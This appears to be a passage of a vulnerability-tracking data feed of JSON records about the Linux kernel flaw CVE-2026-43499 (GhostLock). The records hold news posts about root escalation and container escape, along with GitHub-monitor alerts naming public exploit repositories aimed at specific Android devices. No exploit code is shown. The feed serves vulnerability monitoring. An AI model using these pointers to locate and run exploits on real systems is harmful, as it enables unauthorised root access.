"7b788194-9a67-48f6-8ed0-718298b14102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/Dr5t3AWmhNxHtW6q-vVADHq8j4ahaU0CPtmbuUWAbez-NA", "content": "", "creation_timestamp": "2026-07-15T00:00:37.039477Z"}, {"uuid": "76b03b22-5ad2-4c67-8e9b-92524ea35525", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/92743", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a oppo-ghostlock\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a pubglite55\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-09 22:57:26\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nOPPO Find N2 GhostLock (CVE-2026-43499) exploit adaptation\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-15T00:00:36.639063Z"}, {"uuid": "958377e6-51c7-428e-84cc-b4e0a8883e4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mqnvcdm2qd2u", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43499: 26 interactions\nCVE-2026-20262: 14 interactions\nCVE-2026-44747: 14 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-44747: 14 interactions\nCVE-2026-47295: 6 interactions\nCVE-2026-54527: 6 interactions\n", "creation_timestamp": "2026-07-15T04:32:45.468808Z"}, {"uuid": "360e3954-594c-436f-8237-016fea7f1124", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43499", "type": "seen", "source": "https://bsky.app/profile/devops-daily.com/post/3mqo5kacdtw2y", "content": "\ud83d\udcdd Your Container Is Not a Security Boundary: GhostLock (CVE-2026-43499)\n\nA 15-year-old Linux kernel bug just got a public exploit that breaks out of containers and hands any local user root on the host. GhostLock is a...\n\nRead here: https://devops-daily.com/posts/ghostlock-cve-2026-43499-contain...", "creation_timestamp": "2026-07-15T07:00:20.484596Z"}, {"uuid": "10aaae27-b547-4732-953e-7d43201da663", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/thehackernews/9438", "content": "\ud83d\uded1 A newly found 15-year-old #Linux kernel flaw, GhostLock (CVE-2026-43499), could let any logged-in user gain root on unpatched distributions.\n\nA working exploit code is now public, and it escaped containers in tests.\n\nRead details here: https://thehackernews.com/2026/07/15-year-old-ghostlock-flaw-enables-root.html", "creation_timestamp": "2026-07-15T12:00:03.826660Z"}, {"uuid": "e200c05c-9cd1-45a5-a208-b1dcb75b723c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/HackerNewscyber/3213", "content": "\u2708\ufe0f \u06a9\u0634\u0641 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u06f1\u06f5 \u0633\u0627\u0644\u0647 \u062f\u0631 \u0644\u06cc\u0646\u0648\u06a9\u0633\n\n\ud83c\udfa4\u067e\u0698\u0648\u0647\u0634\u06af\u0631\u0627\u0646 \u0634\u0631\u06a9\u062a Nebula Security \u0627\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062e\u0637\u0631\u0646\u0627\u06a9\u06cc \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 CVE-2026-43499 \u0648 \u0646\u0627\u0645 GhostLock \u062f\u0631 \u0647\u0633\u062a\u0647 \u0644\u06cc\u0646\u0648\u06a9\u0633 \u062e\u0628\u0631 \u062f\u0627\u062f\u0647\u200c\u0627\u0646\u062f\u061b \u0646\u0642\u0635\u06cc \u06a9\u0647 \u0627\u0632 \u0633\u0627\u0644 \u06f2\u06f0\u06f1\u06f1 \u062f\u0631 \u0627\u06a9\u062b\u0631 \u062a\u0648\u0632\u06cc\u0639\u200c\u0647\u0627\u06cc \u0644\u06cc\u0646\u0648\u06a9\u0633 \u0648\u062c\u0648\u062f \u062f\u0627\u0634\u062a\u0647 \u0627\u0633\u062a.\n\n\ud83c\udfa5\u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0627\u0632 \u0646\u0648\u0639 Use-After-Free \u0628\u0648\u062f\u0647 \u0648 \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0645\u062d\u0644\u06cc \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0648\u06cc\u0698\u0647\u060c \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc \u062e\u0648\u062f \u0631\u0627 \u0628\u0647 Root \u0627\u0631\u062a\u0642\u0627 \u062f\u0627\u062f\u0647 \u0648 \u0627\u0632 \u0645\u062d\u06cc\u0637\u200c\u0647\u0627\u06cc \u06a9\u0627\u0646\u062a\u06cc\u0646\u0631\u06cc \u062e\u0627\u0631\u062c \u0634\u0648\u0646\u062f. \u0645\u062d\u0642\u0642\u0627\u0646 \u0627\u0639\u0644\u0627\u0645 \u06a9\u0631\u062f\u0647\u200c\u0627\u0646\u062f \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0627\u06cc\u0646 \u0646\u0642\u0635 \u0628\u0627 \u0646\u0631\u062e \u0645\u0648\u0641\u0642\u06cc\u062a \u062d\u062f\u0648\u062f \u06f9\u06f7 \u062f\u0631\u0635\u062f \u0639\u0645\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u06a9\u062f \u0627\u062b\u0628\u0627\u062a \u0645\u0641\u0647\u0648\u0645 \u0622\u0646 \u0646\u06cc\u0632 \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647 \u0627\u0633\u062a.\n\n\n\u2708\ufe0f @HackerNewsCyber", "creation_timestamp": "2026-07-15T13:00:05.524209Z"}, {"uuid": "dddcc83e-a4fc-4295-8592-a380ddc641e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/hackmag.com/post/3mqp5ezvp642e", "content": "\ud83d\udfe2 GhostLock vulnerability has existed since 2011 and affects major Linux distributions\n\n\ud83d\udde8\ufe0f Researchers at Nebula Security have disclosed a vulnerability in the Linux kernel called GhostLock (CVE-2026-43499). Thi\u2026\n\n#news", "creation_timestamp": "2026-07-15T16:30:06.494997Z"}, {"uuid": "3170699b-9a71-41f2-9020-3f6122a45e45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/bearstech.com/post/3mqplnotvo72h", "content": "Un bel article qui d\u00e9taille GhostLock (CVE-2026-43499) : une vuln\u00e9rabilit\u00e9 du noyau Linux pr\u00e9sente depuis 2011 dans quasi toutes les distributions Linux.\n\n\ud83d\udc49 nebusec.ai/research/...", "creation_timestamp": "2026-07-15T20:45:29.450279Z"}, {"uuid": "5d286a19-0cd3-4f8a-b01d-ca21971b4004", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/HackerNewscyber/3213", "content": "\u2708\ufe0f \u06a9\u0634\u0641 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u06f1\u06f5 \u0633\u0627\u0644\u0647 \u062f\u0631 \u0644\u06cc\u0646\u0648\u06a9\u0633\n\n\ud83c\udfa4\u067e\u0698\u0648\u0647\u0634\u06af\u0631\u0627\u0646 \u0634\u0631\u06a9\u062a Nebula Security \u0627\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062e\u0637\u0631\u0646\u0627\u06a9\u06cc \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 CVE-2026-43499 \u0648 \u0646\u0627\u0645 GhostLock \u062f\u0631 \u0647\u0633\u062a\u0647 \u0644\u06cc\u0646\u0648\u06a9\u0633 \u062e\u0628\u0631 \u062f\u0627\u062f\u0647\u200c\u0627\u0646\u062f\u061b \u0646\u0642\u0635\u06cc \u06a9\u0647 \u0627\u0632 \u0633\u0627\u0644 \u06f2\u06f0\u06f1\u06f1 \u062f\u0631 \u0627\u06a9\u062b\u0631 \u062a\u0648\u0632\u06cc\u0639\u200c\u0647\u0627\u06cc \u0644\u06cc\u0646\u0648\u06a9\u0633 \u0648\u062c\u0648\u062f \u062f\u0627\u0634\u062a\u0647 \u0627\u0633\u062a.\n\n\ud83c\udfa5\u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0627\u0632 \u0646\u0648\u0639 Use-After-Free \u0628\u0648\u062f\u0647 \u0648 \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0645\u062d\u0644\u06cc \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0648\u06cc\u0698\u0647\u060c \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc \u062e\u0648\u062f \u0631\u0627 \u0628\u0647 Root \u0627\u0631\u062a\u0642\u0627 \u062f\u0627\u062f\u0647 \u0648 \u0627\u0632 \u0645\u062d\u06cc\u0637\u200c\u0647\u0627\u06cc \u06a9\u0627\u0646\u062a\u06cc\u0646\u0631\u06cc \u062e\u0627\u0631\u062c \u0634\u0648\u0646\u062f. \u0645\u062d\u0642\u0642\u0627\u0646 \u0627\u0639\u0644\u0627\u0645 \u06a9\u0631\u062f\u0647\u200c\u0627\u0646\u062f \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0627\u06cc\u0646 \u0646\u0642\u0635 \u0628\u0627 \u0646\u0631\u062e \u0645\u0648\u0641\u0642\u06cc\u062a \u062d\u062f\u0648\u062f \u06f9\u06f7 \u062f\u0631\u0635\u062f \u0639\u0645\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u06a9\u062f \u0627\u062b\u0628\u0627\u062a \u0645\u0641\u0647\u0648\u0645 \u0622\u0646 \u0646\u06cc\u0632 \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647 \u0627\u0633\u062a.\n\n\n\u2708\ufe0f @HackerNewsCyber", "creation_timestamp": "2026-07-16T00:00:11.403143Z"}, {"uuid": "4ddeff1c-6b0f-4ed2-87a9-9eda99cbda9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/thehackernews/9438", "content": "\ud83d\uded1 A newly found 15-year-old #Linux kernel flaw, GhostLock (CVE-2026-43499), could let any logged-in user gain root on unpatched distributions.\n\nA working exploit code is now public, and it escaped containers in tests.\n\nRead details here: https://thehackernews.com/2026/07/15-year-old-ghostlock-flaw-enables-root.html", "creation_timestamp": "2026-07-16T00:00:19.549110Z"}, {"uuid": "1d96953a-74d7-4ef6-9ee5-8fd3406f8160", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mqqgcrdq6x27", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43499: 23 interactions\nCVE-2026-15409: 17 interactions\nCVE-2026-20262: 14 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-15409: 15 interactions\nCVE-2026-15410: 8 interactions\nCVE-2026-1541: 6 interactions\n", "creation_timestamp": "2026-07-16T04:42:33.015780Z"}, {"uuid": "37e1457f-98f9-4804-bb45-e05bfd4f1a1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93630", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a ghostlock-rothko\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a SlightNeko\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-16 02:51:33\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 GhostLock exploit for Redmi K70 Ultra (rothko) - data-only physmap overwrite\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-16T12:00:05.135679Z"}, {"uuid": "5fb9ce00-c18f-46c8-b8da-b6408a5786f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/93520", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a onesmiledx\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-15 09:32:38\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA modified method to root Android device with locked bootloader via new exploit. (Only for Samsung now or smthing like that devices cuz i ported it to N970U1), Fork of https://github.com/localhosts-A/CyberMeowfia\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-16T12:00:05.740517Z"}, {"uuid": "ff1f5924-f325-463e-b1f7-acadf1675667", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93613", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #\u5229\u7528\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499-popsicle\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a x-spy\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 154  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 42\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-15 22:47:05\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 Implementation for 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-16T12:00:05.292961Z"}, {"uuid": "fd69164d-02b4-4ca2-a720-fc0d05d0a819", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93634", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CyberMeowfia-ace3\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a DistrictBlauw\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-16 03:52:53\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 exploit with OnePlus Ace3 support\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-16T12:00:05.613471Z"}, {"uuid": "d9b7c45e-700a-4aa1-b95c-4f1d73741167", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/93468", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit #\u6f0f\u6d1e #\u5229\u7528\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a duchamp-root\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Colorful-glassblock\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-15 04:28:08\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nXiaomi K70e (duchamp) one-click root via CVE-2026-43499 (IonStack) + KernelSU integration\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-16T12:00:06.197516Z"}, {"uuid": "9879437a-9ca8-42d4-9888-21f1f261c902", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/93428", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a ghostlock-oneplus\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a JoinChang\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-14 19:09:32\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nGhostLock (CVE-2026-43499) kernel exploit for OnePlus devices with locked bootloader\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-16T12:00:06.445589Z"}, {"uuid": "8d95a0e1-702d-43e3-97cf-fadfd5cac7d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/93455", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit #\u6f0f\u6d1e #\u5229\u7528\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Logitech-G-Cloud-GhostLock-CVE-2026-43499\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a HYCQAQ\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-15 02:28:28\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u7f57\u6280\u4e91\u638c\u673a \u00b7 GhostLock CVE-2026-43499 root \u5c1d\u8bd5\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-16T12:00:06.600485Z"}, {"uuid": "b6b7cdc5-2cd2-4c05-86f0-4b77b48ea317", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/93424", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Exploit #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a ghostlock\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a JoinChang\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-14 19:05:39\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nGhostLock (CVE-2026-43499) kernel exploit for OnePlus devices with locked bootloader\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-16T12:00:06.779764Z"}, {"uuid": "6ae28e64-d4fe-4657-9800-6a4ad9756f8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/93393", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499-Poc-Analysis\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Linuxoid-cn\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-14 14:33:44\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nVulnerability analysis and Proof of Concept (PoC) for CVE-2026-43499 affecting Xiaomi devices. For educational and research purposes only.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-16T12:00:06.858226Z"}, {"uuid": "06e3a7d2-04cb-445c-8e04-2e8ad4e13a87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/93408", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #\u6f0f\u6d1e\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a oppo-A5-PRO-5G-CVE-2026-43499\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a qsvggff-spec\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-14 16:56:46\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u672c\u6b21\u4e2a\u4eba\u6f0f\u6d1e\u7814\u7a76\u8fdb\u5c55\u6210\u679c\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-16T12:00:06.671832Z"}, {"uuid": "72a1f714-6e33-4722-8c55-6edb55a6d7b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/93708", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a IonStack-CVE-2026-43499-jinghu\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ayyy7128\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-16 14:57:46\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 exploit reproduction on jinghu (Xiaomi Pad 7 Ultra)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-16T16:00:03.326662Z"}, {"uuid": "5e63c63a-5b23-4840-8e72-b2131e58e057", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93720", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499-jinghu\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ayyy7128\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 1\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-16 15:53:24\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 exploit reproduction on jinghu (Xiaomi Pad 7 Ultra)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-16T18:00:03.886576Z"}, {"uuid": "5f65f49e-bb39-4b5e-94ae-b73e3205bf5e", "vulnerability_lookup_origin": 